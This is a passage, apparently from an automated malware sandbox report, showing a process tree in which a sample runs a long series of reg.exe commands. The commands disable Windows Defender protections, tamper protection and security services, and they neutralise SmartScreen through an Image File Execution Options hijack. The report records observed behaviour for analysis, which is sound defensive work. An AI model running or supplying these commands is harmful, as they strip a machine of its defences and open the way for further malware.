                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1552
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                      8⤵
                                                                                        PID:2144
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRawWriteNotification /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:772
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2572
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2368
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1588
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:564
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:1580
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:316
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2540
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d "0" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2292
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableInformationProtectionControl /t REG_DWORD /d "0" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2448
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:840
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2528
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:2344
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f /reg:64
                                                                                        8⤵
                                                                                          PID:2196
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2496
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f /reg:64
                                                                                          8⤵
                                                                                            PID:2200
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f
                                                                                            8⤵
                                                                                              PID:2548
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d "0" /f /reg:64
                                                                                              8⤵
                                                                                                PID:1556
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d "0" /f /reg:64
                                                                                                8⤵
                                                                                                  PID:1852
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f /reg:64
                                                                                                  8⤵
                                                                                                    PID:2384
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f
                                                                                                    8⤵
                                                                                                      PID:1576
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d "8" /f /reg:64
                                                                                                      8⤵
                                                                                                        PID:1308
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f /reg:64
                                                                                                        8⤵
                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                        PID:2480
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f
                                                                                                        8⤵
                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                        PID:2108
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f /reg:64
                                                                                                        8⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2268
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                        8⤵
                                                                                                          PID:2260
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f /reg:64
                                                                                                          8⤵
                                                                                                            PID:1684
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                                                                                            8⤵
                                                                                                              PID:2128
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f /reg:64
                                                                                                              8⤵
                                                                                                                PID:2256
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                                                                                                8⤵
                                                                                                                  PID:2888
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                  8⤵
                                                                                                                    PID:2884
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                    8⤵
                                                                                                                      PID:2140
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "1" /f /reg:64
                                                                                                                      8⤵
                                                                                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                      PID:1620
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f /reg:64
                                                                                                                      8⤵
                                                                                                                        PID:2700
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f
                                                                                                                        8⤵
                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                        PID:2736
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                        8⤵
                                                                                                                        • Modifies security service
                                                                                                                        PID:2836
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                        8⤵
                                                                                                                          PID:2712
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:652
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                            PID:3060
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                            8⤵
                                                                                                                            • Modifies Security services
                                                                                                                            PID:2104
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                            8⤵
                                                                                                                              PID:2204
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                              8⤵
                                                                                                                                PID:2840
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                8⤵
                                                                                                                                  PID:588
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:1332
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2772
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2768
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2644
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2192
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2788
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2612
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2628
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2804
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:1624
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:2600
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2844
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies security service
                                                                                                                                  PID:2672
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                    PID:1924
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                    8⤵
                                                                                                                                      PID:2724
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                      8⤵
                                                                                                                                        PID:2616
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                        8⤵
                                                                                                                                          PID:2720
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                          8⤵
                                                                                                                                            PID:2064
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                            8⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:1152
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                            8⤵
                                                                                                                                              PID:2668
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                              • Modifies Security services
                                                                                                                                              PID:2684
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                                PID:3004
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Security services
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2604
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                  PID:2856
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies Security services
                                                                                                                                                  PID:340
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies Security services
                                                                                                                                                  PID:264
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies Security services
                                                                                                                                                  PID:2996
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies Security services
                                                                                                                                                  PID:1396
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies security service
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1832
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                    PID:1036
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                    8⤵
                                                                                                                                                      PID:1796
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                      8⤵
                                                                                                                                                        PID:2792
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                        8⤵
                                                                                                                                                          PID:888
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                          8⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2648
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:2036
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f
                                                                                                                                                              9⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2816
                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                              find /i "webthreatdefusersvc"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:2660
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                              8⤵
                                                                                                                                                                PID:3008
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:2972
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:3024
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2848
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f /reg:64
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2864
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f /reg:64
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:1004
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                      8⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3000
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                      8⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2016
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:1976
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2032
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f /reg:64
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:2588
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:844
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:2948
